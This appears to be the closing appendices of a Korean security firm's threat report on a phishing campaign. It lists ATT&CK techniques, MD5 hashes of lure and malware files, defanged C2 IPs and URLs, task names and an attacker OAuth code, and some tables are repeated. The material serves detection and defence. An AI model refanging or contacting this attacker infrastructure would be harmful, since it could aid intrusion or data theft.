| Execution | T1059.001: Command and Scripting Interpreter: PowerShell-nT1059.003: Command and Scripting Interpreter: Windows Command Shell-nT1059.005: Command and Scripting Interpreter: Visual Basic-nT1204.002: User Execution: Malicious File |
| Persistence | T1053.005: Scheduled Task/Job: Scheduled Task |
| Privilege Escalation | T1548.002: Abuse Elevation Control Mechanism: Bypass User Account Control |
| Stealth | T1027.013: Obfuscated Files or Information: Encrypted/Encoded File-nT1140: Deobfuscate/Decode Files or Information-nT1564: Hide Artifacts-nT1070: Indicator Removal |
| Discovery | T1010: Application Window Discovery-nT1012: Query Registry-nT1082: System Information Discovery-nT1083: File and Directory Discovery-nT1518.001: Software Discovery: Security Software Discovery |
| Collection | T1005: Data from Local System-nT1056.001: Input Capture: Keylogging-nT1114: Email Collection |
| Command and Control | T1071.001: Application Layer Protocol: Web Protocols-nT1132.001: Data Encoding: Standard Encoding-nT1219: Remote Access Tools-nT1573.001: Encrypted Channel: Symmetric Cryptography |
| Exfiltration | T1041: Exfiltration Over C2 Channel

caption - MITRE ATT&CK

부록 B. IOCs

md5

| MD5 | 정보 |
|---|---|
| 8de25f181d32417fc34b2a77d2f4804b | 피싱 이메일 |
| 95d049f184c02aa756b361c2dacb354d | 習氏は何をしに平壌に行ったのか.zip |
| cac69a696fc155717dabe641f22db0c9 | 習氏は何をしに平壌に行ったのか.lnk |
| 18e33961d2007c89311f7754313292b3 | pattern.zip |
| e7da02737751f2f171aed28694b9554e | 5月9日資料.pdf.lnk |
| 300f7b8ff182c8c69a0c499cdda6f8b8 | 米国のホルムズ逆封鎖は中国に効いている.zip |
| a2191f29f58b9f0cb576b7459ed6680d | 米国のホルムズ逆封鎖は中国に効いている.lnk |
| 94ed14ef07ac7504a3983ace8d894aae | SDD_2026.zip |
| 5b49177d14f073bd7abf4c94688ebd84 | Directions and Parking information.lnk |
| 4c5474238c4b2ec2ca0698902c084624 | Invitation to SDD 2026 Breifing Session.lnk |
| 7c6ac06ccfa7648a4a8cc916c14d9f67 | JINF.pdf |
| 77a7dfdc7bd74cc47ac3f4f8e019936c | logo.png |
| d7dbce5d25aa483d9c5ec1223ed6bf6e | Thunderbird 메일 수집 파워쉘 스크립트 |
| e8aaa4f579e6be788929d3548b31bf6d | Outlook 메일 수집 파워쉘 스크립트 |
| 5727c0ff18c58b80bca5ce80575996bd | 크롬 원격 데스크톱 설치 파워쉘 스크립트 |
| 633e672cce390d75f44f2e2357dec7b3 | 1.bat |
| 0210f46648d4e36a98c2c0fae404f36d | background.js |
| 3ad9fbfad7ffb569b1aa24d4588edc60 | content.js |
| f6f7a94c11ea0ee01cbbe674cfac7851 | manifest.json |
| 54089d9cf9c7d5ff9abbae88437f66a8 | AnyDesk 설치 배치 파일 |
| 51e1876c971c76d9664ad198af8a5b61 | app.vmd |
| c08ea73bac08ea4f4665e9e0b0fdd2a8 | mnfst.vmd |
| eb80f7bddb699784baa9fbf2941eaf4a | attach.vmd |
| c774b3980151881d9d546710126b5ded | sch.vmd |
| f3620e42e9c726c65ea7e14e3bf35464 | vpost.vmd |
| 8e4410c65ca11664561e1b6036209122 | bimage.vmd

| MD5 | 정보 |
|---|---|
| 8de25f181d32417fc34b2a77d2f4804b | 피싱 이메일 |
| 95d049f184c02aa756b361c2dacb354d | 習氏は何をしに平壌に行ったのか.zip |
| cac69a696fc155717dabe641f22db0c9 | 習氏は何をしに平壌に行ったのか.lnk |
| 18e33961d2007c89311f7754313292b3 | pattern.zip |
| e7da02737751f2f171aed28694b9554e | 5月9日資料.pdf.lnk |
| 300f7b8ff182c8c69a0c499cdda6f8b8 | 米国のホルムズ逆封鎖は中国に効いている.zip |
| a2191f29f58b9f0cb576b7459ed6680d | 米国のホルムズ逆封鎖は中国に効いている.lnk |
| 94ed14ef07ac7504a3983ace8d894aae | SDD_2026.zip |
| 5b49177d14f073bd7abf4c94688ebd84 | Directions and Parking information.lnk |
| 4c5474238c4b2ec2ca0698902c084624 | Invitation to SDD 2026 Breifing Session.lnk |
| 7c6ac06ccfa7648a4a8cc916c14d9f67 | JINF.pdf |
| 77a7dfdc7bd74cc47ac3f4f8e019936c | logo.png |
| d7dbce5d25aa483d9c5ec1223ed6bf6e | Thunderbird 메일 수집 파워쉘 스크립트 |
| e8aaa4f579e6be788929d3548b31bf6d | Outlook 메일 수집 파워쉘 스크립트 |
| 5727c0ff18c58b80bca5ce80575996bd | 크롬 원격 데스크톱 설치 파워쉘 스크립트 |
| 633e672cce390d75f44f2e2357dec7b3 | 1.bat |
| 0210f46648d4e36a98c2c0fae404f36d | background.js |
| 3ad9fbfad7ffb569b1aa24d4588edc60 | content.js |
| f6f7a94c11ea0ee01cbbe674cfac7851 | manifest.json |
| 54089d9cf9c7d5ff9abbae88437f66a8 | AnyDesk 설치 배치 파일 |
| 51e1876c971c76d9664ad198af8a5b61 | app.vmd |
| c08ea73bac08ea4f4665e9e0b0fdd2a8 | mnfst.vmd |
| eb80f7bddb699784baa9fbf2941eaf4a | attach.vmd |
| c774b3980151881d9d546710126b5ded | sch.vmd |
| f3620e42e9c726c65ea7e14e3bf35464 | vpost.vmd |
| 8e4410c65ca11664561e1b6036209122 | bimage.vmd

| MD5 | 정보 |
|---|---|
| 8de25f181d32417fc34b2a77d2f4804b | 피싱 이메일 |
| 95d049f184c02aa756b361c2dacb354d | 習氏は何をしに平壌に行ったのか.zip |
| cac69a696fc155717dabe641f22db0c9 | 習氏は何をしに平壌に行ったのか.lnk |
| 18e33961d2007c89311f7754313292b3 | pattern.zip |
| e7da02737751f2f171aed28694b9554e | 5月9日資料.pdf.lnk |
| 300f7b8ff182c8c69a0c499cdda6f8b8 | 米国のホルムズ逆封鎖は中国に効いている.zip |
| a2191f29f58b9f0cb576b7459ed6680d | 米国のホルムズ逆封鎖は中国に効いている.lnk |
| 94ed14ef07ac7504a3983ace8d894aae | SDD_2026.zip |
| 5b49177d14f073bd7abf4c94688ebd84 | Directions and Parking information.lnk |
| 4c5474238c4b2ec2ca0698902c084624 | Invitation to SDD 2026 Breifing Session.lnk |
| 7c6ac06ccfa7648a4a8cc916c14d9f67 | JINF.pdf |
| 77a7dfdc7bd74cc47ac3f4f8e019936c | logo.png |
| d7dbce5d25aa483d9c5ec1223ed6bf6e | Thunderbird 메일 수집 파워쉘 스크립트 |
| e8aaa4f579e6be788929d3548b31bf6d | Outlook 메일 수집 파워쉘 스크립트 |
| 5727c0ff18c58b80bca5ce80575996bd | 크롬 원격 데스크톱 설치 파워쉘 스크립트 |
| 633e672cce390d75f44f2e2357dec7b3 | 1.bat |
| 0210f46648d4e36a98c2c0fae404f36d | background.js |
| 3ad9fbfad7ffb569b1aa24d4588edc60 | content.js |
| f6f7a94c11ea0ee01cbbe674cfac7851 | manifest.json |
| 54089d9cf9c7d5ff9abbae88437f66a8 | AnyDesk 설치 배치 파일 |
| 51e1876c971c76d9664ad198af8a5b61 | app.vmd |
| c08ea73bac08ea4f4665e9e0b0fdd2a8 | mnfst.vmd |
| eb80f7bddb699784baa9fbf2941eaf4a | attach.vmd |
| c774b3980151881d9d546710126b5ded | sch.vmd |
| f3620e42e9c726c65ea7e14e3bf35464 | vpost.vmd |
| 8e4410c65ca11664561e1b6036209122 | bimage.vmd

caption - md5

IP

  • 103.77.242[.]187

  • 160.187.147[.]119

  • 84.247.145[.]65

  • 210.183.177[.]217

  • 103.249.117[.]183

URL

  • hxxps://1drv[.]ms/u/c/2c732f3239360d98/IQDihidlH5aGTK-prrMLTrBIAcbEYFb4_w7HUbeFeiZU6Go?e=wpzaBO

  • hxxp://103.77.242[.]187/JINF.pdf

  • hxxp://103.77.242[.]187/logo.png

  • hxxp://103.77.242[.]187/view.php?type=apple&seed=<MAC주소>

  • hxxp://103.249.117[.]183/1.bat

  • hxxp://103.249.117[.]183/receive.php

  • hxxps://sweet-iki-4263.holy[.]jp/gmail.php

  • hxxp://160.187.147[.]119/any/app.vmd

  • hxxp://160.187.147[.]119/any/mnfst.vmd

  • hxxp://160.187.147[.]119/any/attach.vmd

  • hxxp://160.187.147[.]119/any/sch.vmd

  • hxxp://160.187.147[.]119/any/vpost.vmd

  • hxxp://160.187.147[.]119/any/bimage.vmd

뮤텍스명

  • MyAnyMutexName

작업명

  • Chrome_Update

  • User_Feed_Synchronization-{0DDC1BD9-E733-425C-B92B-ABAC149AB11232}

부록 C. Metadata

공격자 OAuth 인가 코드

  • @4/0AdkVLPzBKUSDVADc4Ru8idnLfXfKe6n0fpQrCTSXpbc3V5PSKEafp952MzQsKmOEr-bPGQ

엔키화이트햇

엔키화이트햇

ENKI Whitehat
ENKI Whitehat

오펜시브 시큐리티 전문 기업, 공격자 관점으로 깊이가 다른 보안을 제시합니다.

오펜시브 시큐리티 전문 기업, 공격자 관점으로 깊이가 다른 보안을 제시합니다.

隙のないセキュリティ設計の始まり、NO.1ホワイトハッカーのノウハウから

インシデント発生前、
今すぐ備えましょう

隙のないセキュリティ設計の始まり、
No.1ホワイトハッカーのノウハウから

インシデント発生前、
今すぐ備えましょう

隙のないセキュリティ設計の始まり、
No.1ホワイトハッカーのノウハウから

インシデント発生前、
今すぐ備えましょう

購読する

コンテンツが役に立ったら?
エンキーレターを購読しましょう!

Copyright © 2025. ENKI WhiteHat Co., Ltd. All rights reserved.

Copyright © 2025. ENKI WhiteHat Co., Ltd. All rights reserved.

Copyright © 2025. ENKI WhiteHat Co., Ltd. All rights reserved.